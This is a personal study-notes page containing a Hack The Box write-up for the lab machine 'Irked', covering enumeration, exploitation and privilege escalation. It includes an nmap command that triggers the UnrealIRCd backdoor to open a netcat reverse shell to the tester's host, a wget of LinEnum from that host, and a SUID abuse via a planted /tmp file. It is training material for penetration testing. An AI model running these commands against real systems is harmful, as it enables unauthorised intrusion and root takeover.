My Notes Hub
  • 📍Introduction Page
  • ⭐Learning Process
    • 🧠Learning Mindset
    • 🖇️Learning Dependencies
    • 🧮Learning Process
  • 🔠Fundamentals
    • 🛜Networking
    • 🐧Linux Fundamentals
      • Introduction
    • 🪟Windows Fundamentals
    • 🕵️Active Directory
    • 🕸️Introduction to Web Applications
  • 🧰Tools
    • Nmap
    • ✅Nessus
    • Metasploit
    • ExploitDB
    • ✅Ffuf
    • ✅Hydra
    • ✅John The Ripper
  • ✍️Write Ups
    • 🗃️Hack The Box Machines
      • ✅Irked
      • ✅Nibbles
      • ✅Brainfuck
      • Lame
  • 📋Cheat Sheets
    • Penetration Testing Cheat Sheet
  • 🪪Certificates
    • Penetration Tester (HTB CPTS)
      • Penetration Testing Process
      • Reconnaissance, Enumeration & Attack Planning
        • Network Enumeration with Nmap (Continue Here)
        • Footprinting (Continue Here)
        • Vulnerability Scanning
        • File Transfers (Continue Here)
        • Using the Metasploit Framework
        • Web Information Gathering
      • Web Exploitation
        • Using Web Proxies
        • Attacking Web Applications With Ffuf
        • Login Bruteforcing
        • Cross-Site Scripting (XSS)
        • Command Injection
        • SQL Injection
        • File Upload Attacks
        • File Inclusion
      • Post-Exploitation
        • Linux Privilege Escalation
  • 🗄️Archive/Backup/Bin
    • Sysmon Usecases (IBM)
    • 🐧Linux Fundamentals (TryHackMe)
      • Introduction
      • Basic Commands
      • Wildcards & Operators
      • Permissions
      • Common Directories
      • Terminal Text Editors
      • General/Useful Utilities
      • Processes101
      • Maintaining Your System
    • 🪟Windows Fundamentals (TryHackMe)
      • Introduction
      • The File System
      • User Accounts
      • Settings & Control Panel & Task Manager
      • System Configuration
    • Active Directory (TryHackMe)
      • Breaching Active Directory
      • Enumerating Active Directory
      • Lateral Movement and Pivoting
      • Exploiting Active Directory
      • Presisting Active Directory
      • Credientials Harvesting
    • FOR508: Advanced Incident Response, Threat Hunting, and Digital Forensics
      • Book 2 - Intrusion Analysis
        • Credential Theft
        • Advanced Evidence of Execution
        • Event Log Analysis for Responders and Hunters
    • Certified Threat Hunting Professional (eCTHPv2)
      • Introduction to Threat Hunting
      • Threat Hunting: Hunting the Network & Network Analysis
      • Threat Hunting: Hunting the Endpoint & Endpoint Analysis
        • Event IDs, Logging, & SIEMs
    • OSCP
      • Report Writing
      • ✅Passive Information Gathering
      • ✅Active Information Gathering
      • ✅Vulnerability Scanning
      • Introduction to Web Application Attacks
      • Common Web Application Attacks
        • ✅Cross-Site Scripting (XSS)
        • ✅Directory Traversal
        • ✅File Inclusion
        • ✅File Upload Vulnerabilities
        • Command Injection
        • SQL Injection Attacks
        • Client Side Attacks
      • ✅Locating Public Exploits
      • ✅Exploiting Walkthrough
      • Fixing Exploits
      • ✅Antivirus Evasion
      • Password Attacks
      • Windows Privilege Escalation
      • Linux Privilege Escalation
      • Port Redirection and SSH Tunneling
      • Tunneling Through Deep Packet Inspection
      • The Metasploit Framework
      • Active Directory Introduction & Enumeration
      • Attacking Active Directory Authentication
      • Lateral Movement in Active Directory
      • Assembling the Pieces
      • Other General Information
    • My Pentesting Cheatsheet
      • Methodology
      • Information Gathering
      • Vulnerability Assesment
      • Exploitation
      • Post-Exploitation
    • ⚡Port Swigger (Web Penetration Testing)
      • ✅Information Disclosure
      • ✅Path Traversal (Directory Traversal)
      • ✅OS Command Injection
      • Business Logic Vulnerabilities
      • ✅Authentication
      • ✅Access Control
    • Certified Bug Bounty Hunter (CBBH)
      • Web Requests
        • HTTP Fundamentals
    • Getting Started
      • Introduction
      • Pentesting Basics
    • Certified Penetration Testing Specialist (CPTS)
      • Introduction
        • ✅Penetration Testing Process
          • Penetration Testing Overview
          • Laws & Regulations
          • Penetration Testing Process
          • Pre-Engagement
          • Information Gathering
          • Vulnerability Assessment
          • Exploitation
          • Post-Exploitation
          • Lateral Movement
          • Proof-of-Concept
          • Post-Engagement
          • Practice
          • Academy Module Layout
        • Getting Started with Hack The Box (HTB)
      • Reconnaissance, Enumeration & Attack Planning
        • ✅Network Enumeration with Nmap
          • Enumeration & Introduction to Nmap
          • Host Discovery
          • Host and Port Scanning
          • Saving The Results
          • Service Enumeration
          • Nmap Scripting Engine
          • Scanning Performance
          • Firewall and IDS/IPS Evasion
        • Footprinting
        • ✅Information Gathering - Web Edition
          • Introduction
          • Passive Information Gathering
          • Active Information Gathering
        • Vulnerability Assessment
        • File Transfers
        • Shells & Payloads
        • Using the Metasploit Framework
      • Exploitation & Lateral Movement
        • Password Attacks
        • Attacking Common Services
        • Pivoting, Tunneling, and Port Forwarding
        • Active Directory Enumeration & Attacks
      • Web Exploitation
        • Using Web Proxies
        • ✅Attacking Web Applications with Ffuf
        • ✅Login Brute Forcing
        • SQL Injection Fundamentals
        • SQLMap Essentials
        • Cross-Site Scripting (XSS)
        • File Inclusion
        • File Upload Attacks
        • Command Injections
        • Web Attacks
        • Attacking Common Applications
      • Post-Exploitation
        • Linux Privilege Escalation
        • Windows Privilege Escalation
      • Reporting & Capstone
        • Documentation & Reporting
        • Attacking Enterprise Networks
Powered by GitBook
On this page
  1. Write Ups
  2. Hack The Box Machines

Irked

PreviousHack The Box MachinesNextNibbles

Last updated 1 year ago

Type: Linux

Difficuility: Easy

Link: https://app.hackthebox.com/machines/Irked

IP Address: 10.10.10.117

Enumeration

  • Run nmap: sudo nmap -sC -sV -p- -Pn -oA Irked 10.10.10.117

  • 22/tcp is SSH and is secure by default (not many CVEs) so skip it

  • 80/tcp is HTTP, start running gobuster and enumerate the site manually

    • \/manual is the default Apache page (Rabbithole, tried a few CVEs but nothing worked)

  • 111 is RPCBind after looking into it, it turned out to be just another rabbithole.

  • 6697, 8067, 38196, 65534 are related to UnRealIRC and the index page included a smiley face and a note about IRC so it's most likely these ports.

Exploitation

  • Check for nmap scripts related to UnRealIRC, cd \/usr\/share\/nmap\scripts && ls | grep -i irc

  • run this script on the target, sudo nmap -p 6697,8067,65534 --script irc-unrealircd-backdoor 10.10.10.117

  • Find that one of the ports is vulnerable (8067)

  • Start a listner, nc -nlvp 4444

  • Exploit the target using the script, nmap -p 8067 --script=irc-unrealircd-backdoor --script-args=irc-unrealircd-backdoor.command="nc -e /bin/bash 10.10.16.3 4444" 10.10.10.117

  • Get a reverse shell.

  • Upgrade the reverse shell,

    • python -c 'import pty; pty.spawn("/bin/bash")' - Spwans /bin/bash using Python’s PTY module

    • Ctrl + Z - Background the shell.

    • stty raw -echo && fg - Upgrade the local terminal with stty and foreground the reverse shell.

    • Double Enter

Privilege Escalation

  • Transfer LinEnum to the target

    • python3 -m http.server 8080 - Starts a basic http server (On Your Own Machine)

    • cd /tmp - Because we can write/read/execute into/from tmp. (On the Target Machine)

    • wget http://10.10.16.3:8080/LinEnum.sh - Downloads LinEnum.sh on the target machine (On the Target Machine)

    • chmod +x LinEnum.sh - Make it executable.

    • ./LinEnum.sh - Runs LinEnum.

  • LinEnum:

  • There is a file name viewuser with SUID bit set.

When the SUID bit is set for a file, it will execute with the level of privilege that matches the user who owns the file.

  • Run the file (viewuser)

  • The file runs another file, tmp/listusers

  • Edit the file so that it runs bash (echo "bash" > /tmp/Listusers)

  • When running I got permission denied so I edited the permissions of the Listusers file (chmod +xwr /tmp/Listuser/)

  • After running viewuser we get root access.

Flags:

✍️
🗃️
✅
  • Enumeration
  • Exploitation
  • Privilege Escalation
  • Flags:
Nmap Results
Index Page
Apache Default Page
Gobuster results
SUID Files (LinEnum)
tmp/listuser
/tmp/Listusers
User Flag
Root Flag